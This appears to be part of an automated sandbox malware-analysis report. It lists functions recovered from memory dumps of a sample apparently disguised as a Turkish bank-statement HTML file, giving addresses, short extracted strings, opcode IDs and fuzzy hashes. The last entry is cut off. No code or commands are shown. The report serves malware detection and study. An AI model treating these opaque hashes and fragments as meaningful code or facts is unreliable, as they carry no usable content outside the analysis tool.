Opcode ID: 4df3705093ba0a2cdbc342a5e30267dcb588b65259d9ff33243100fa0da9dbd5
Instruction ID: f77787042015d2270c0fc581356a75702d5326819583337583c78920193db19c
Opcode Fuzzy Hash: 4df3705093ba0a2cdbc342a5e30267dcb588b65259d9ff33243100fa0da9dbd5
Instruction Fuzzy Hash: 9F81B374E00618CFDB59DFA9D984A9DBBF2BF88300F14C0A9E419AB365DB349985CF50

Function 02B329EC Relevance: 5.5, Strings: 4, Instructions: 494COMMON

Download Yara Rule

Strings

Xgq, xrefs: 02B32B57
Xgq, xrefs: 02B32BA4
Xgq, xrefs: 02B32AD8
Xgq, xrefs: 02B32A9E

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: Xgq$Xgq$Xgq$Xgq
API String ID: 0-1951159037
Opcode ID: 6e4c9d74eaee8ee78b69489a03dff796c173511c166f56c8505b8584dbf4933f
Instruction ID: f549659c80ab2c81c5c06b7307ba40a08c4f4a09952cd5527dac7dec7e0653cd
Opcode Fuzzy Hash: 6e4c9d74eaee8ee78b69489a03dff796c173511c166f56c8505b8584dbf4933f
Instruction Fuzzy Hash: F0E145A1E4A2954FCB328B7885952EFBFB1AFAB300F4C15DDC8955F346D6258902CF41

Function 02B3A088 Relevance: 3.4, Strings: 2, Instructions: 890COMMON

Download Yara Rule

Strings

(ocq, xrefs: 02B3A518
4'cq, xrefs: 02B3AB13

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (ocq$4'cq
API String ID: 0-3004416391
Opcode ID: 2ed0af1a01cf9b7cfc06b9c784ba6b06a44f8850611b43757aac5758b9e69243
Instruction ID: ca58ee055274a9fa750afd57a9d91158c362ca1e6a407fba3c78ce0779b3c3cb
Opcode Fuzzy Hash: 2ed0af1a01cf9b7cfc06b9c784ba6b06a44f8850611b43757aac5758b9e69243
Instruction Fuzzy Hash: 4882A235A00209DFCB16CFA8C984AAEBBF2FF88314F258599E4559B365D731ED81CB50

Function 02B369B0 Relevance: 3.1, Strings: 2, Instructions: 561COMMON

Download Yara Rule

Strings

(ocq, xrefs: 02B36EDA
Hgq, xrefs: 02B36DA6

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (ocq$Hgq
API String ID: 0-2239030825
Opcode ID: 76035d7f77a5e2ad159e92d6cb0ade3fabef5c3fddd42843cc7ab6e26b849838
Instruction ID: 8c2da85a2499b05ada4a8453cf14a822d241594ad27634f56f5cd1a29368a1a6
Opcode Fuzzy Hash: 76035d7f77a5e2ad159e92d6cb0ade3fabef5c3fddd42843cc7ab6e26b849838
Instruction Fuzzy Hash: E5228B70A002199FCB19DF69C954BAEBBB6FF88304F1484A9E915DB391DF349D41CB90

Function 02B3E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6a7f4e4e7a94808651a388ef159c0ebfa675fe69a51745aa5321c684384f39a
Instruction ID: 7afd628aa34bd975bfc17414ab41b4c3301bccd543fb023cde4c3742be7cb16b
Opcode Fuzzy Hash: f6a7f4e4e7a94808651a388ef159c0ebfa675fe69a51745aa5321c684384f39a
Instruction Fuzzy Hash: 2C51B774E00608DFDB19DFAAD594A9DBBF2FF89300F20806AE915AB365DB309941CF54

Function 02B3E97A Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33dbb1766f798a154bdcbb4fc17049aa87119e1aaf5728804f50efb5af569d9
Instruction ID: c752ff3a9e231e2c76321ad079fcd7051ee8d2d3ff69804098ed5a8cd4cae930
Opcode Fuzzy Hash: a33dbb1766f798a154bdcbb4fc17049aa87119e1aaf5728804f50efb5af569d9
Instruction Fuzzy Hash: 8E51B674E00208DFDB19DFAAD594A9DBBB2FF89300F24C06AE915AB365DB309841CF54

Function 02B376F1 Relevance: 10.5, Strings: 8, Instructions: 470COMMON

Download Yara Rule

Strings

(ocq, xrefs: 02B37BFF
(ocq, xrefs: 02B377E9
(ocq, xrefs: 02B37C0F
,gq, xrefs: 02B37B90
(ocq, xrefs: 02B37815
,gq, xrefs: 02B37BA0
(ocq, xrefs: 02B378B2
(ocq, xrefs: 02B3772E

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
API String ID: 0-3338910979
Opcode ID: 1c488fde34110e00bc6e9be732fb6d74c5fe1e599695d0f02fc4d01e20091e79
Instruction ID: c1ff98e8e6f66f56e4e3e43d6d671af97b0aebd8ba59aff91181bb652f029462
Opcode Fuzzy Hash: 1c488fde34110e00bc6e9be732fb6d74c5fe1e599695d0f02fc4d01e20091e79
Instruction Fuzzy Hash: 71126974A00648DFCB16CF69D894AAEFBF2FF88314F548599E4159B261DB30ED41CB90

Function 02B36498 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

,gq, xrefs: 02B3656E
,gq, xrefs: 02B36578

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: ,gq$,gq
API String ID: 0-2533611571
Opcode ID: 824dd5fbfa19ed7c9f56c9a93d8b37399e237e4fc38174e1129c03a1a3951d58
Instruction ID: b57ae9e9b4ebc4577f2af0ca6875d1d78eacf9c797012c2ab4d2a85e71f147e1
Opcode Fuzzy Hash: 824dd5fbfa19ed7c9f56c9a93d8b37399e237e4fc38174e1129c03a1a3951d58
Instruction Fuzzy Hash: 1A81D131B00509EFCB16CF69C484AAABBFAFF89344B1581A9D405D7365DB31EC41CB64

Function 02B35F5C Relevance: 2.7, Strings: 2, Instructions: 166COMMON

Download Yara Rule

Strings

Hgq, xrefs: 02B36056
Hgq, xrefs: 02B36023

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: Hgq$Hgq
API String ID: 0-3391890871
Opcode ID: 76af55acaecdfc82e9693ddee42f685c80c96026e3c88eeb5fef012571b74d48
Instruction ID: c9ab9fc69fd6d1995e104d51be42631744119deb678bbf5aa762adb7e66311f3
Opcode Fuzzy Hash: 76af55acaecdfc82e9693ddee42f685c80c96026e3c88eeb5fef012571b74d48
Instruction Fuzzy Hash: 3F51EE31704255AFDB269F24D898B7E7BFAFF89344F0448A9E8468B290DF35C841CB94

Function 02B39C30 Relevance: 2.6, Strings: 2, Instructions: 148COMMON

Download Yara Rule

Strings

4'cq, xrefs: 02B39D6D
4'cq, xrefs: 02B39D84

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 4'cq$4'cq
API String ID: 0-60795322
Opcode ID: ee4d42e176dc37207bea238bfd8dbda090183b9e4f6aef238f34364ba43752c8
Instruction ID: ca0c14877b5d6dcd7a42045f444bbbb09070e036ca9262dda6695bf3dd1366cd
Opcode Fuzzy Hash: ee4d42e176dc37207bea238bfd8dbda090183b9e4f6aef238f34364ba43752c8
Instruction Fuzzy Hash: 9B51AF717006449FDB02DF69C884B6ABBEAFF88350F4484A6E949CB355DBB1DC01CBA1

Function 02B33CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xgq, xrefs: 02B33CF6
Xgq, xrefs: 02B33CCD

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: Xgq$Xgq
API String ID: 0-2113765878
Opcode ID: aaa633db5a4c0fed30e836a97d6efa8689004d9321ff583e7986cdbb1a39d9f9
Instruction ID: 59584b7cf98ae3e752df5b260fc3661bc7e0aaf37cb192607ccd9e07340ef9d4
Opcode Fuzzy Hash: aaa633db5a4c0fed30e836a97d6efa8689004d9321ff583e7986cdbb1a39d9f9
Instruction Fuzzy Hash: D4310735B043248BDF2A4A69899427FB6E6EBC4255F1444F9E816C7380DFB5CC8587D1

Function 02B38EF8 Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

$cq, xrefs: 02B38FD7
$cq, xrefs: 02B38FB4

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: $cq$$cq
API String ID: 0-2695052418
Opcode ID: cf10baf5eb06a17df7715563833653ec0ff32b7d4ea4476d3d0a28f6f54dfccb
Instruction ID: b22ca43f41bab952607e59138aaa8a3fc7c9ff9cbd28d52ea100fb11a7fe6028
Opcode Fuzzy Hash: cf10baf5eb06a17df7715563833653ec0ff32b7d4ea4476d3d0a28f6f54dfccb
Instruction Fuzzy Hash: 72319F313045528FCB2B9B69D95473E7B6BFB84750B254CEAF012CB292EB28DC80C756

Function 02B30C8F Relevance: 1.8, Strings: 1, Instructions: 543COMMON

Download Yara Rule

Strings

LRcq, xrefs: 02B30F19

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: LRcq
API String ID: 0-4134321033
Opcode ID: f5d79cdd74d275b00c1c63009b3bc618f6774a3d1241f5ac2d40252db93c8e3e
Instruction ID: fd301d80656d01d6cb250fc64f513b0bd46669b394df795a0acedc4dae768db0
Opcode Fuzzy Hash: f5d79cdd74d275b00c1c63009b3bc618f6774a3d1241f5ac2d40252db93c8e3e
Instruction Fuzzy Hash: C552FB74900619CFCB95EF24EA84A9DBBB2FF48305F1049A9D409AB758EF706E85CF50

Function 02B30CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRcq, xrefs: 02B30F19

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: LRcq
API String ID: 0-4134321033
Opcode ID: ae55931f937f3be68855edda334e2a263684bed7d45401626bc04a1645128cb6
Instruction ID: 93b2ec40e3653a9211848d2d131eefc88c9a62329b04bc666141fbfa1b2d8115
Opcode Fuzzy Hash: ae55931f937f3be68855edda334e2a263684bed7d45401626bc04a1645128cb6
Instruction Fuzzy Hash: 6052FC74900619CFCB95EF24EA84A9DBBB2FF48305F1049A9D409AB758EF706E85CF50

Function 02B3AEBA Relevance: 1.3, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

(ocq, xrefs: 02B3AECD

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (ocq
API String ID: 0-1855696158
Opcode ID: 2897aca5b38b88c1be29efeef9b40c96a4c94f7b53f3439a6cf6fe30671f66fa
Instruction ID: 550fb861aedadfb232d3abd24e22a86dc48442bd8787ec23e538a9e8b5a09e1f
Opcode Fuzzy Hash: 2897aca5b38b88c1be29efeef9b40c96a4c94f7b53f3439a6cf6fe30671f66fa
Instruction Fuzzy Hash: 1F115A36B401049FCB01DFA8E954BA9BBB5FF8C244F2444A9E646D72A0DB31E810CB50

Function 02B3E007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b1eeaa9da4cfee0bedaede7659c76fec8d2b02df66e8116fe41c8cc7833cc8c
Instruction ID: 41230c8ab1349cd4033a462d731fd65331e835498e728ddcafb7d6d01761a5a5
Opcode Fuzzy Hash: 0b1eeaa9da4cfee0bedaede7659c76fec8d2b02df66e8116fe41c8cc7833cc8c
Instruction Fuzzy Hash: 3E12AB348A1212DFA250AF70E3EC23E7B65FB1F3A3714AC12F15BC25559B3594A4CE62

Function 02B3E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 244f6316234c19da82c92c9d838233bc0099c2fb1b986981234e6f3f3606e9f4
Instruction ID: c939051cd39f8758701f5979019c44fd2bd3f901b83ea9aafbe16d30d548b132
Opcode Fuzzy Hash: 244f6316234c19da82c92c9d838233bc0099c2fb1b986981234e6f3f3606e9f4
Instruction Fuzzy Hash: ED129B348A1212DFA250AF70E3EC23E7B65FB1F3A3714AC12F15BC25559B3594A4CE62

Function 02B39A10 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb269d7e7b9186b681d033a95916875e9d9bf89c1c1e22ba859936dbc5036a95
Instruction ID: 8db201983f3ec4d9e6893d4e40893b792c582387769381eaa69bc42fe2a33208
Opcode Fuzzy Hash: eb269d7e7b9186b681d033a95916875e9d9bf89c1c1e22ba859936dbc5036a95
Instruction Fuzzy Hash: 1D812931904A059FCB12CF2CC8809AABBF6FF85324B15C7A6D86897355D771F856CBA0

Function 02B380D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24ac1633a1e62f3f5349313e81aedbe483eeb4b83b93c846de787fe6ec1120a
Instruction ID: 3ea11e6cd282a15d6dba41d60f3b0ab25b5daaee47978c7ca566c289c1ade4da
Opcode Fuzzy Hash: c24ac1633a1e62f3f5349313e81aedbe483eeb4b83b93c846de787fe6ec1120a
Instruction Fuzzy Hash: 5D713734700A098FCB16DF68C898AAA7BE6FF89244B1544A9F856DB370DB70DC45CB52

Function 02B3F3F1 Relevance: .1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab6048d605cc18c85744d2941d1c872c9237e82dace61bb4f4fd29f03187f36
Instruction ID: 5e52c24604236e63566ed2f753433530a15200766e8570131d0ee10b53a0d4af
Opcode Fuzzy Hash: 0ab6048d605cc18c85744d2941d1c872c9237e82dace61bb4f4fd29f03187f36
Instruction Fuzzy Hash: 3D513474D01218CFDB16DFA4D954BAEBBB2FF89300F208169D809AB399DB755946CF40

Function 02B360A0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b64d746302b0c00eab938b64419056f46feaddfc8a68ee6081be1ee76f58eee
Instruction ID: f9128d92ad73ac344f9b6c06430abc3232c05edf3d6ccbb510f7773adbdcb69f
Opcode Fuzzy Hash: 9b64d746302b0c00eab938b64419056f46feaddfc8a68ee6081be1ee76f58eee
Instruction Fuzzy Hash: C741F130B046019FDB1AAF38D8A873E7BA6EB84344F1488A9D556CB396DF34CD81C785

Function 02B3D548 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53af86c3fec30a9bfd3bcddb4dd7869d9557ddced2c43dba71f0724efaa736c2
Instruction ID: 3a2cbc3b030514a94a5c76b0eb5f13bbc2bed41aa9c0cad6c1b2c62f263dcc18
Opcode Fuzzy Hash: 53af86c3fec30a9bfd3bcddb4dd7869d9557ddced2c43dba71f0724efaa736c2
Instruction Fuzzy Hash: 1E518074E01208DFDB58DFA9D98499DBBF2BF89300F248169E819AB364DB31A901CF50

Function 02B341A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b562ed1ed087e96b490b02f0d831a7f72339db2c87952816e33c076fd5333bda
Instruction ID: faa33503b549e2cb7a9828cd68aebb698145ec9e8a94130cf0e001ed633d4328
Opcode Fuzzy Hash: b562ed1ed087e96b490b02f0d831a7f72339db2c87952816e33c076fd5333bda
Instruction Fuzzy Hash: 4451A474E01208CFCB48DFA9D98499DBBF2FF89305B208469E815AB328DB31AD41CF50

Function 02B3A303 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a55a31f38065fcb548d8ed09523823cbcdcb53277741f41152d6cb9374a75a63
Instruction ID: c3cb05baf51e02b57f3ddb79f920c96525244222a204e11add3241814a617ba5
Opcode Fuzzy Hash: a55a31f38065fcb548d8ed09523823cbcdcb53277741f41152d6cb9374a75a63
Instruction Fuzzy Hash: 7B41E431A00249DFCF12CFA8C844B9EBFB2FF49364F248595E885AB2A1D334E954CB50

Function 02B3AF00 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b0395bf6f78f80af106279af0d3c0bc3a268948f75eb01587add06a7d6b7a10
Instruction ID: e83043116ce66815f117fecf1ac53ca80f57f6c5d5f42435f0aeea730bfe2e73
Opcode Fuzzy Hash: 9b0395bf6f78f80af106279af0d3c0bc3a268948f75eb01587add06a7d6b7a10
Instruction Fuzzy Hash: EB31D272B102049FCB05AF68D954BAEBBB2FB88350F244469E916D7390DF319D01CB90

Function 02B35658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed9dbcdff2f10cea2af38551b7ac477279a35bfdb8c70a0c71bf58b175e04309
Instruction ID: ad89582fdc33f262d5dffde71007ae2cd557236e6dcf7dbea8cf03ce4bcb6407
Opcode Fuzzy Hash: ed9dbcdff2f10cea2af38551b7ac477279a35bfdb8c70a0c71bf58b175e04309
Instruction Fuzzy Hash: A031BE3260420AEFCF169F64E954AAF3BB2FB8C344F004468F92597294DB35CD21DBA0

Function 02B38380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f722505aa6d7dda44f90dfc734ccb5b917d1062490a5833c5a4305cd07e77c7a
Instruction ID: e8171a557c2016c0f8488260df705d8310224e97987ca4cd480acc704ee174b1
Opcode Fuzzy Hash: f722505aa6d7dda44f90dfc734ccb5b917d1062490a5833c5a4305cd07e77c7a
Instruction Fuzzy Hash: 2E21CC323002008BDB161A26855473E768BEFC4768F5880B9F416CBB98EB3ACC42D383

Function 02B362F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd107c92716068b7f6ed01d02580e41116c0a2f4eb70635f8d40742177863fa4
Instruction ID: 1b55d94dc7269088465a5f29db02a1cfa5a0f65bd575be40ef8f44222096fdb9
Opcode Fuzzy Hash: dd107c92716068b7f6ed01d02580e41116c0a2f4eb70635f8d40742177863fa4
Instruction Fuzzy Hash: DB2123367056119FC71A9A2CD454A2EB7A6FFCA79971484BDE826CB394CF30CC02CB80

Function 02B328F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15ea013385fdb90ce6365d9b618528be02f2c3bd6e7db41f307c8109bc9fe77
Instruction ID: 0c0dedec5aabd598382baea9bb68602d01b560f09241a5335e8b78ba9f8d6b5b
Opcode Fuzzy Hash: f15ea013385fdb90ce6365d9b618528be02f2c3bd6e7db41f307c8109bc9fe77
Instruction Fuzzy Hash: 5621E235A001069FCB15DB24D540AAE77B5EB8C320B20C569D9098B358EB30EE42CBD0

Function 0115D554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713020264.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_115d000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99831636f8b4ca8841642f96b9fe0e6593bc114510e8861922e4c89bf46b3bfb
Instruction ID: 274da09668435cb4d7b8ccdf0dd93da3cf39224f4116ff43582b1920ac5441fb
Opcode Fuzzy Hash: 99831636f8b4ca8841642f96b9fe0e6593bc114510e8861922e4c89bf46b3bfb
Instruction Fuzzy Hash: 2621C1B1504240DFDF5ADF98E980B26BF75FB88328F24C569ED090B256C336D456CBA2

Function 0116D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713129243.000000000116D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0116D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_116d000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69d7a7ab3e3bb575bb583d21c05168884a82ed7541671acadb2804c3fcb4a313
Instruction ID: bb5149235b995ef28535c01cf08dfd46a267108ac13660a4249e8089c572291d
Opcode Fuzzy Hash: 69d7a7ab3e3bb575bb583d21c05168884a82ed7541671acadb2804c3fcb4a313
Instruction Fuzzy Hash: 21214971604204DFCF19CF68E9C0B26BB69FB84314F20C9ADE8894B342C73BD456CA62

Function 02B34285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89aed1d9d7900d63123dda2968cebec94cc03282290f56588fa42acafa5a3c58
Instruction ID: ffed19e40454f7b3363183b5500a9239a282d320b1c07bf2b963fa8fc8db39ee
Opcode Fuzzy Hash: 89aed1d9d7900d63123dda2968cebec94cc03282290f56588fa42acafa5a3c58
Instruction Fuzzy Hash: 97319774E11208CFCB45DFA8E68489DBBB2FF49305B204469E819AB768DB31AD05CF00

Function 02B35649 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac5f7f7d60ab7ae0cfbc68e2cce820009d984ed4c0d12ed29674c4e5bb66725
Instruction ID: 778f89ff4391863171240c24bf45cb2568aa22ecb1e920b10f07341759e7b8cb
Opcode Fuzzy Hash: dac5f7f7d60ab7ae0cfbc68e2cce820009d984ed4c0d12ed29674c4e5bb66725
Instruction Fuzzy Hash: 4021D532605109DFCB269F68E554BAF3BB1EB58358F0044A8E8258B344DB75DD61CB90

Function 02B3AEF0 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b7ef369a20379dc1f5f6c9de8543119a7955653272f5ccd26483a3b91161e71
Instruction ID: c561e3a7d72d6ae122dc57837507c475a4041ddcba3ce5a6bef12e12c82bfa2f
Opcode Fuzzy Hash: 6b7ef369a20379dc1f5f6c9de8543119a7955653272f5ccd26483a3b91161e71
Instruction Fuzzy Hash: E621AE32B002049FCB119F68ED54BD9BBB5FB8C350F1445AAEA11E7290DB719C10CB90

Function 02B39761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.4713711344.0000000002B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
